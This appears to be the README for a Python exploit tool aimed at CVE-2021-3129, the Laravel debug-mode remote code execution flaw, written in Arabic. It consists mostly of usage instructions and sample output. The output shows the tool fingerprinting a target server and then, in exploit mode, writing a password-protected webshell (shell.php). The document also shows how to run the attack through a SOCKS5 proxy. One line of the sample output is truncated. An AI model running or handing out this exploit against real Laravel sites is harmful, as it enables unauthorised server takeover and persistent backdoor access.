
Laravel Debug mode ثغرة RCE (CVE-2021-3129) poc / exp
CVE-2021-3129 exp / poc
python CVE-2021-3129.py
usage: python CVE-2021-3129.py -u [url] --exp
وضع التصحيح Laravel RCE (CVE-2021-3129) POC & EXP
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL تحديد عنوان URL الهدف
-e, --exp استغلال الثغرة لكتابة webshell، إذا لم تحدده، فسيتم فقط الكشف عن الثغرة
-p PROXY, --proxy PROXY
تعيين وكيل، مثل socks5://127.0.0.1:7890
# اختبار الثغرة (PoC)
python CVE-2021-3129.py -u http://xxxxx.com
[✅] تم اكتشاف الثغرة! [🚩]url: http://xxxxx.com [❇️معلومات] إصدار PHP: 7.4.14 مسار الموقع: /var/www/html عنوان الخادم: 172.17.0.2 إصدار النظام: Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64
# استغلال (Exp)
python CVE-2021-3129.py -u http://xxxxx.com --exp
[✅] تم اكتشاف الثغرة! [🚩]url: http://xxxxx.com [❇️معلومات] إصدار PHP: 7.4.14 مسار الموقع: /var/www/html عنوان الخادم: 172.17.0.2 إصدار النظام: Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64
[OK] تم كتابة webshell بنجاح، رابط الوصول: http://xxxxx.com/shell.php، كلمة المرور: whoami
# وكيل
python CVE-2021-3129.py -u http://xxxxx.com/ -p socks5://127.0.0.1:7890
python CVE-2021-3129.py -u http://xxxxx.com/ --exp -p socks5://127.0.0.1:7890
روابط مرجعية
إرشادات الاستخدام